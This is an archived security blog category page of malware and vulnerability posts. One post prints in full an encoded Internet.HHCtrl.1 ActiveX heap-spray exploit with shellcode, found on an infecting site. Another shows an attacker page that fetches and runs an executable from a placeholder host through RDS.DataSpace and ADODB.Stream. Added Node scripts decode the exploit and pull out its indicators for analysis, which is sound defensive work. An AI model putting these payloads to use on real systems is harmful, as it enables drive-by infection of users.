You are viewing a read-only archive of the Blogs.Harvard network.

Category Archives: Vulnerabilities

buffers and the people who overflow them

WordPress 2.5.0 and 2.5.1 vulnerable to attack

Thanks to co-author Brandon Palmen for the heads-up on a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations through a recently announced vulnerability. More details are in a well-written write-up here. The code snippets from a digitalpoint.com forum are shown using base64 encoding […]

Top 2007 Symantec Vulnerabilities

MAY 25, 2006 | eEye Digital Security revealed this afternoon a software vulnerability in Symantec AntiVirus Corporate Edition 10.0. According to the warning posted on the vendor’s Upcoming Advisories page, exploiting the flaw requires no user intervention, so it could be used to create a worm. A Symantec representative told Dark Reading that eEye notified Symantec of the problem today […]

Great Reading List on Web Exploits

I was reading up on inet-lux and found a great blog post in Spanish which provides a must-read reference list. I ended up here reading about a Java-based botnet tool I found while researching appeals today. I hope to have more on that later but have not had time to decompile it. Anyone […]

Internet.HHCtrl.1 Exploit

I’ve enclosed the code in a text box to make reading it a little easier. This code was found on a live site that is using the exploit via iframes to infect drive by downloaders. Extra br tags are a result of the blog software…. <script> t=”60,83,67,82,73,80,84,32,108,97,110,103,117,97,103,101,61,74,97,118,97,83,99,114,105,112,116,62,104,72,72,67,116,114,108,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,73,110,116,101,114,110,101,116,46,72,72,67,116,114,108,46,49,34,41,59,13,10,118,97,114,32,101,118,105,108,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,34,41,59,13,10,118,97,114,32,73,109,97,103,101,115,32,61,32,34,65,99,116,105,118,101,88,46,34,32,43,32,101,118,105,108,32,43,32,34,82,116,108,65,108,108,111,99,97,116,101,72,101,97,112,82,116,108,67,114,101,97,116,101,72,101,97,112,34,59,13,10,118,97,114,32,99,111,117,110,116,32,61,32,48,59,118,97,114,32,109,97,120,99,111,117,110,116,32,61,32,49,48,59,102,117,110,99,116,105,111,110,32,67,108,105,99,107,84,111,40,41,123,32,104,72,72,67,116,114,108,46,73,109,97,103,101,32,61,32,73,109,97,103,101,115,59,125,13,10,102,117,110,99,116,105,111,110,32,71,111,116,73,116,40,41,123,32,99,111,117,110,116,43,43,59,32,105,102,40,99,111,117,110,116,32,60,32,109,97,120,99,111,117,110,116,41,32,123,32,32,120,46,111,110,99,108,105,99,107,40,41,59,32,32,71,111,116,73,116,40,41,59,32,125,125,13,10,102,117,110,99,116,105,111,110,32,66,117,105,108,100,67,111,110,116,101,120,116,40,41,123,32,112,97,121,108,111,97,100,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,54,48,57,48,37,117,49,55,101,98,37,117,54,52,53,101,37,117,51,48,97,49,37,117,48,48,48,48,37,117,48,53,48,48,37,117,48,56,48,48,37,117,48,48,48,48,37,117,102,56,56,98,37,117,48,48,98,57,37,117,48,48,48,52,37,117,102,51,48,48,37,117,102,102,97,52,37,117,101,56,101,48,37,117,102,102,101,52,37,117,102,102,102,102,37,117,97,49,54,52,37,117,48,48,51,48,37,117,4
8,48,48,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,55,48,37,117,101,99,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,101,99,56,98,37,117,101,56,98,98,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,48,51,37,117,48,102,99,48,37,117,98,98,56,53,37,117,48,48,48,48,37,117,102,102,48,48,37,117,101,57,48,51,37,117,48,50,50,49,37,117,48,48,48,48,37,117,56,57,53,98,37,117,50,48,53,100,37,117,54,56,53,54,37,117,102,101,57,56,37,117,48,101,56,97,37,117,98,49,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,99,52,53,37,117,54,56,53,54,37,117,52,101,56,101,37,117,101,99,48,101,37,117,97,51,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,52,52,53,37,117,54,56,53,54,37,117,55,57,99,49,37,117,98,56,101,53,37,117,57,53,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,99,52,53,37,117,54,56,53,54,37,117,99,54,49,98,37,117,55,57,52,54,37,117,56,55,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,48,52,53,37,117,54,56,53,54,37,117,102,99,97,97,37,117,55,99,48,100,37,117,55,57,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,56,52,53,37,117,54,56,53,54,37,117,56,52,101,55,37,117,98,52,54,57,37,117,54,98,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,52,52,53,37,117,101,48,98,98,37,117,48,50,48,102,37,117,56,57,48,48,37,117,51,51,48,51,37,117,99,55,102,54,37,117,50,56,52,53,37,117,53,50,53,53,37,117,52,100,52,99,37,117,52,53,99,55,37,117,52,102,50,99,37,117,48,48,52,101,37,117,56,100,48,48,37,117,50,56,53,100,37,117,102,102,53,51,37,117,48,52,53,53,37,117,54,56,53,48,37,117,49,97,51,54,37,117,55,48,50,102,37,117,51,102,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,50,52,52,53,37,117,55,102,54,97,37,117,53,100,56,100,37,117,53,51,50,56,37,117,53,53,102,102,37,117,99,55,49,99,37,117,48,53,52,52,37,117,53,99,50,56,37,117,54,53,50,101,37,117,99,55,55,56,37,117,48,53,52,52,37,117,54,53,50,99,37,117,48,48,48,48,37,117,53,54,48,48,37,117,56,100,53,54,37,117,50,56,55,100,37,117,102,102,53,55,3
7,117,50,48,55,53,37,117,102,102,53,54,37,117,50,52,53,53,37,117,53,55,53,54,37,117,53,53,102,102,37,117,101,56,48,99,37,117,48,48,54,50,37,117,48,48,48,48,37,117,99,52,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,51,51,54,49,37,117,99,50,99,48,37,117,48,48,48,52,37,117,56,98,53,53,37,117,53,49,101,99,37,117,56,98,53,51,37,117,48,56,55,100,37,117,53,100,56,98,37,117,53,54,48,99,37,117,55,51,56,98,37,117,56,98,51,99,37,117,49,101,55,52,37,117,48,51,55,56,37,117,53,54,102,51,37,117,55,54,56,98,37,117,48,51,50,48,37,117,51,51,102,51,37,117,52,57,99,57,37,117,97,100,52,49,37,117,99,51,48,51,37,117,51,51,53,54,37,117,48,102,102,54,37,117,49,48,98,101,37,117,102,50,51,97,37,117,48,56,55,52,37,117,99,101,99,49,37,117,48,51,48,100,37,117,52,48,102,50,37,117,102,49,101,98,37,117,102,101,51,98,37,117,55,53,53,101,37,117,53,97,101,53,37,117,101,98,56,98,37,117,53,97,56,98,37,117,48,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98,37,117,56,98,52,98,37,117,49,99,53,97,37,117,100,100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37,117,53,101,99,53,37,117,53,57,53,98,37,117,99,50,53,100,37,117,48,48,48,56,37,117,57,50,101,57,37,117,48,48,48,48,37,117,53,101,48,48,37,117,56,48,98,102,37,117,48,50,48,99,37,117,98,57,48,48,37,117,48,49,48,48,37,117,48,48,48,48,37,117,97,52,102,51,37,117,101,99,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,102,99,56,98,37,117,99,55,56,51,37,117,99,55,49,48,37,117,54,101,48,55,37,117,54,52,55,52,37,117,99,55,54,99,37,117,48,52,52,55,37,117,48,48,54,99,37,117,48,48,48,48,37,117,102,102,53,55,37,117,48,52,53,53,37,117,52,53,56,57,37,117,99,55,50,52,37,117,53,50,48,55,37,117,54,99,55,52,37,117,99,55,52,49,37,117,48,52,52,55,37,117,54,99,54,99,37,117,54,51,54,102,37,117,52,55,99,55,37,117,54,49,48,56,37,117,54,53,55,52,37,117,99,55,52,56,37,117,48,99,52,55,37,117,54,49,54,53,37,117,48,48,55,48,37,117,53,48,53,55,37,117,53,53,102,102,37,117,56,98,48,56,37,117,98,56,102,48,37,117,48,102,101,52,37,117,48,48,48,50,37,117,51,48,56,57,37,117,48,55,99,
55,37,117,55,51,54,100,37,117,54,51,55,54,37,117,52,55,99,55,37,117,55,50,48,52,37,117,48,48,55,52,37,117,53,55,48,48,37,117,53,53,102,102,37,117,56,98,48,52,37,117,51,99,52,56,37,117,56,99,56,98,37,117,56,48,48,56,37,117,48,48,48,48,37,117,51,57,48,48,37,117,48,56,51,52,37,117,48,52,55,52,37,117,102,57,101,50,37,117,49,50,101,98,37,117,51,52,56,100,37,117,53,53,48,56,37,117,52,48,54,97,37,117,48,52,54,97,37,117,102,102,53,54,37,117,49,48,53,53,37,117,48,54,99,55,37,117,48,99,56,48,37,117,48,48,48,50,37,117,99,52,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,101,56,99,51,37,117,102,102,54,57,37,117,102,102,102,102,37,117,48,52,56,98,37,117,53,51,50,52,37,117,53,50,53,49,37,117,53,55,53,54,37,117,101,99,98,57,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,49,57,37,117,55,53,100,98,37,117,51,51,53,48,37,117,51,51,99,57,37,117,56,51,100,98,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,49,53,37,117,55,53,48,48,37,117,56,51,51,101,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,51,53,37,117,55,53,48,48,37,117,56,51,51,48,37,117,48,50,101,56,37,117,98,55,48,102,37,117,56,51,49,56,37,117,54,97,102,98,37,117,50,53,55,53,37,117,99,48,56,51,37,117,56,98,48,52,37,117,98,56,51,48,37,117,48,102,101,48,37,117,48,48,48,50,37,117,48,48,54,56,37,117,48,48,48,48,37,117,54,56,48,49,37,117,49,48,48,48,37,117,48,48,48,48,37,117,48,48,54,97,37,117,49,48,102,102,37,117,48,54,56,57,37,117,52,52,56,57,37,117,49,56,50,52,37,117,101,99,98,57,37,117,48,50,48,102,37,117,102,102,48,48,37,117,53,102,48,49,37,117,53,97,53,101,37,117,53,98,53,57,37,117,101,52,98,56,37,117,48,50,48,102,37,117,102,102,48,48,37,117,101,56,50,48,37,117,102,100,100,97,37,117,102,102,102,102,34,41,59,13,10,104,111,109,101,61,117,110,101,115,99,97,112,101,40,34,37,117,55,52,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,117,54,51,50,102,37,117,54,49,54,57,37,117,54,54,50,101,37,117,54,57,54,50,37,117,54,102,50,101,37,1
17,54,55,55,50,37,117,54,51,50,101,37,117,50,102,54,101,37,117,55,51,54,51,37,117,50,101,54,101,37,117,55,56,54,53,37,117,48,48,54,53,37,117,48,48,48,48,34,41,59,13,10,114,117,110,110,97,98,108,101,32,61,32,112,97,121,108,111,97,100,43,104,111,109,101,59,32,115,107,105,112,112,101,114,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,56,52,56,37,117,52,56,52,56,34,41,59,13,10,119,104,105,108,101,32,40,115,107,105,112,112,101,114,46,108,101,110,103,116,104,60,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,32,123,32,32,115,107,105,112,112,101,114,43,61,115,107,105,112,112,101,114,59,32,125,13,10,115,107,105,112,112,101,114,49,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,115,107,105,112,112,101,114,50,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,107,105,112,112,101,114,46,108,101,110,103,116,104,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,119,104,105,108,101,40,115,107,105,112,112,101,114,50,46,108,101,110,103,116,104,60,40,48,120,52,48,48,48,48,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,41,32,123,32,32,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,50,59,13,10,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,49,59,32,125,32,99,111,110,116,101,120,116,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,32,105,105,61,45,49,59,32,119,104,105,108,101,40,43,43,105,105,60,51,48,48,41,13,10,123,32,32,99,111,110,116,101,120,116,91,105,105,93,32,61,32,115,107,105,112,112,101,114,50,32,43,32,114,117,110,110,97,98,108,101,59,32,125,32,71,111,116,73,116,40,41,59,125,102,117,110,99,116,105,111,110,32,116,101,115,116,40,41,123,32,97,108,101,114,116,40,41,59,125,60,47,83,67,82,73,80,84,62″ t=eval(“String.fromCharCode(“+t+”)”); document.write(t); </script> </HEAD><BODY 
onload=BuildContext();> <BUTTON id=x onclick=ClickTo();> […]
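Decoded by hand from the char codes above, the loader does three things: it creates an Internet.HHCtrl.1 object; in BuildContext() it builds a heap spray of 300 strings, each padded with the "skipper" filler (%u4848, i.e. 0x48 bytes) to just under 0x40000 UTF-16 units with the shellcode at the end; and on each of up to ten synthetic button clicks it assigns "ActiveX." + four \u000b characters + "RtlAllocateHeapRtlCreateHeap" to the control's Image property, which is the trigger. The script below is an added example, not code from the post: it decodes a String.fromCharCode list like the one above without touching eval, turns the %uXXXX strings into the bytes a disassembler would see, and reproduces the spray's size arithmetic. The SAMPLE_* constants are constructed from the first words of the sample above; nothing here runs attacker code.

```javascript
// Added example (not from the original post): static triage of a
// String.fromCharCode()/eval() loader and its unescape("%u....") heap spray.

// First 28 char codes of the loader above: they decode to the opening <SCRIPT> tag.
const SAMPLE_CODES =
  '60,83,67,82,73,80,84,32,108,97,110,103,117,97,103,101,61,74,97,118,97,83,99,114,105,112,116,62';
// First words of the payload and of the sled ("skipper") from the sample above.
const SAMPLE_PAYLOAD = '%u9090%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%ue8e0%uffe4%uffff';
const SAMPLE_SLED = '%u4848%u4848';

// Decode a comma-separated list of decimal char codes. Whitespace and line
// wraps (a blog breaking "4\n8" out of "48") are removed before splitting.
function decodeCharCodeList(list) {
  return list.replace(/\s+/g, '').split(',').filter(Boolean).map((c) => {
    const n = Number(c);
    if (!Number.isInteger(n) || n < 0 || n > 0xffff) throw new Error('bad char code: ' + c);
    return String.fromCharCode(n);
  }).join('');
}

// Parse the argument of unescape() into UTF-16 code units: %uXXXX is one
// unit, %XX one unit below 256, anything else a literal character.
function unescapeToUnits(s) {
  const units = [];
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|([\s\S])/g;
  let m;
  while ((m = re.exec(s)) !== null) {
    if (m[1] !== undefined) units.push(parseInt(m[1], 16));
    else if (m[2] !== undefined) units.push(parseInt(m[2], 16));
    else units.push(m[3].charCodeAt(0));
  }
  return units;
}

// A JS string sits in memory as little-endian UTF-16, so %u17eb becomes the
// bytes eb 17 (jmp short +0x17). This is the byte order a disassembler wants.
function unitsToBytes(units) {
  const bytes = [];
  for (const u of units) bytes.push(u & 0xff, (u >>> 8) & 0xff);
  return bytes;
}

const hex = (bytes) => bytes.map((b) => b.toString(16).padStart(2, '0')).join(' ');

// Longest run of one repeated byte: a sled (0x90 NOP, or 0x48 "dec eax" here).
function longestRun(bytes) {
  let best = { byte: -1, len: 0 };
  let cur = { byte: -1, len: 0 };
  for (const b of bytes) {
    cur = b === cur.byte ? { byte: b, len: cur.len + 1 } : { byte: b, len: 1 };
    if (cur.len > best.len) best = cur;
  }
  return best;
}

// The sample's spray loops, run on lengths instead of strings so this needs
// constant memory. Defaults are the sample's: seed "%u4848%u4848" (2 units),
// blocks grown toward 0x40000 units, 300 blocks. Because the seed doubles
// from a power of two and the sample subtracts 20 units of headroom, every
// block comes out at exactly 0x40000-20 units (0x7FFD8 bytes), whatever the
// payload length.
function sprayLayout(runnableLen, opts = {}) {
  const seedLen = opts.seedLen === undefined ? 2 : opts.seedLen;
  const blockTarget = opts.blockTarget === undefined ? 0x40000 : opts.blockTarget;
  const blocks = opts.blocks === undefined ? 300 : opts.blocks;
  let skipper = seedLen;
  while (skipper < 20 + runnableLen) skipper += skipper;      // skipper += skipper
  const skipper1 = 20 + runnableLen;                           // skipper.substring(0, 20+len)
  let skipper2 = skipper - 20 - runnableLen;                   // skipper.substring(0, skipper.length-20-len)
  while (skipper2 < blockTarget - 20 - runnableLen) {
    skipper2 += skipper2;                                      // skipper2 += skipper2
    skipper2 += skipper1;                                      // skipper2 += skipper1
  }
  const blockUnits = skipper2 + runnableLen;                   // context[ii] = skipper2 + runnable
  return {
    blockUnits,
    blockBytes: blockUnits * 2,
    payloadOffset: skipper2 * 2,   // byte offset of the payload inside every block
    totalBytes: blockUnits * 2 * blocks,
  };
}

// Put it together for the constructed sample.
function triageSample() {
  const payload = unitsToBytes(unescapeToUnits(SAMPLE_PAYLOAD));
  const sled = unitsToBytes(unescapeToUnits(SAMPLE_SLED));
  return {
    decodedHead: decodeCharCodeList(SAMPLE_CODES),
    payloadHead: hex(payload.slice(0, 8)),   // 90 90 90 60 eb 17 5e 64: nop, nop, nop, pushad, jmp, pop esi
    sled: longestRun(sled),
    spray: sprayLayout(SAMPLE_PAYLOAD.length / 6),  // one UTF-16 unit per %uXXXX
  };
}

console.log(triageSample());
```

Run it with node. The one thing worth remembering from the spray arithmetic is that the total is about 157 MB of 0x48 filler with the same shellcode at the end of every 512 KB block, which is why the trigger can afford to point the corrupted pointer at any address in that range and still land in a sled.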

another variation of drive by downloaders

The exploit used is fairly old. One other important thing to note is that the CLSID used here is a Microsoft database control (RDS.DataSpace, part of MDAC). This is what the attacker's page looks like when fetched directly:

[zero@day testing]$ curl http://EVIL_SITE/db/wm.htm
<script>
var url,path;
url="http://EVIL_SITE/mc/game/db.exe";
path="C:\\boot.exe";
try{
var ado=(document.createElement("object"));
var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ab="Adodb.";
var cd="Stream";
var g=1;
var as=ado.createobject(ab+cd,"");
var h=1;
xml.Open("GET",url,0);
[…]
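The fetched page above is the classic download-and-execute pattern: the RDS.DataSpace control is used to instantiate Microsoft.XMLHTTP and ADODB.Stream (the ProgID split into "Adodb." + "Stream", a cheap way around string signatures), the executable is fetched from the url variable and, in the truncated remainder, presumably written to the path variable. As an added example that is not code from the post, the Node script below pulls those indicators out of such a page statically, without running it: CLSIDs, the ProgIDs handed to CreateObject (reassembling split strings), the XMLHTTP Open() target, URLs and drop paths. SAMPLE is constructed to mirror the snippet, with the post's EVIL_SITE placeholder kept and the blog's curly quotes replaced by plain ones.

```javascript
// Added example (not from the original post): static indicator extraction
// from a download-and-execute page of the kind shown above.

const SAMPLE = `<script>
var url,path;
url="http://EVIL_SITE/mc/game/db.exe";
path="C:\\\\boot.exe";
try{
var ado=(document.createElement("object"));
var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ab="Adodb.";
var cd="Stream";
var g=1;
var as=ado.createobject(ab+cd,"");
var h=1;
xml.Open("GET",url,0);
</script>`;

// CLSIDs worth naming on sight. The one in the sample is RDS.DataSpace from
// MDAC, the "Microsoft database control" the post refers to.
const KNOWN_CLSIDS = {
  'BD96C556-65A3-11D0-983A-00C04FC29E36': 'RDS.DataSpace (MDAC, patched by MS06-014)',
};

// Undo the escapes a JS string literal can carry (\\ \" \xHH \uHHHH \n ...).
function unescapeJsLiteral(body) {
  const simple = { n: '\n', r: '\r', t: '\t', 0: '\0' };
  return body.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[\s\S])/g, (_, e) =>
    e.length > 1 ? String.fromCharCode(parseInt(e.slice(1), 16)) : (e in simple ? simple[e] : e));
}

// Collect name = "literal" assignments (with or without var) so that split
// strings such as ab+cd can be reassembled later.
function collectLiterals(src) {
  const vars = new Map();
  const re = /(?:var\s+)?([A-Za-z_$][\w$]*)\s*=\s*(["'])((?:\\.|(?!\2)[^\\])*)\2/g;
  let m;
  while ((m = re.exec(src)) !== null) vars.set(m[1], unescapeJsLiteral(m[3]));
  return vars;
}

// Resolve an argument made of literals and known variables joined with '+'.
// Returns null when a part cannot be resolved statically.
function resolveExpr(expr, vars) {
  let out = '';
  for (const part of expr.split('+').map((p) => p.trim())) {
    const lit = /^(["'])([\s\S]*)\1$/.exec(part);
    if (lit) out += unescapeJsLiteral(lit[2]);
    else if (vars.has(part)) out += vars.get(part);
    else return null;
  }
  return out;
}

function extractIndicators(src) {
  const vars = collectLiterals(src);
  const clsids = [];
  for (const m of src.matchAll(/clsid:([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})/gi)) {
    const id = m[1].toUpperCase();
    clsids.push({ clsid: id, known: KNOWN_CLSIDS[id] || null });
  }
  const progids = [];    // COM objects instantiated through the control
  for (const m of src.matchAll(/\.createobject\(\s*([^,)]+)/gi)) {
    progids.push(resolveExpr(m[1], vars) || m[1].trim());
  }
  const downloads = [];  // XMLHTTP .Open(method, url, ...) calls
  for (const m of src.matchAll(/\.open\(\s*([^,)]+)\s*,\s*([^,)]+)/gi)) {
    downloads.push({ method: resolveExpr(m[1], vars) || m[1].trim(), url: resolveExpr(m[2], vars) || m[2].trim() });
  }
  const values = [...vars.values()];
  return {
    clsids,
    progids,
    downloads,
    urls: values.filter((v) => /^https?:\/\//i.test(v)),
    dropPaths: values.filter((v) => /^[A-Za-z]:\\/.test(v)),
  };
}

console.log(JSON.stringify(extractIndicators(SAMPLE), null, 2));
```

The resolver only follows literal-to-variable concatenation, which is enough for this sample; a page that builds its strings with fromCharCode or a decoder function needs the decoding step from the HHCtrl example instead.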

Hi, I’m a Mac

And I can get 0wned just like you, PC.

ImageIO
CVE-ID: CVE-2006-3459, CVE-2006-3461, CVE-2006-3462, CVE-2006-3465
Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079
Impact: Viewing a maliciously-crafted TIFF image may lead to an application crash or arbitrary code execution
Description: Buffer overflows were discovered in TIFF tag […]

More attacks on my web server [Elf Kaiten.AQ]

the same as the last one, which was based on Mambo (an open source CMS). This time I was able to pull the files down in time.
EDIT: More information here, documented by enkrypted.
UPDATE: Secunia reports this as Elf Kaiten.AQ. Trend Micro reports the trojan but the statistics are horribly wrong. Just the channel I’m monitoring […]

Interesting attacks on my web server

Still think that firewall is enough to protect your web server? Port 80 to the rescue! Through a combination of curl, wget and various shell commands, this “URL” is a sneaky little rootkit. I haven’t had time to download the executables and rip them apart but something tells me that after all is said and […]

Latest on OS X research

Tom Ferris, noted security researcher, has listed a series of new bugs to come out for OS X. It’s an interesting mixture of bugs, consisting mostly of heap overflows. This is scary for those who would like to think that their OS X machine is 100% safe from malware. The media doesn’t always help […]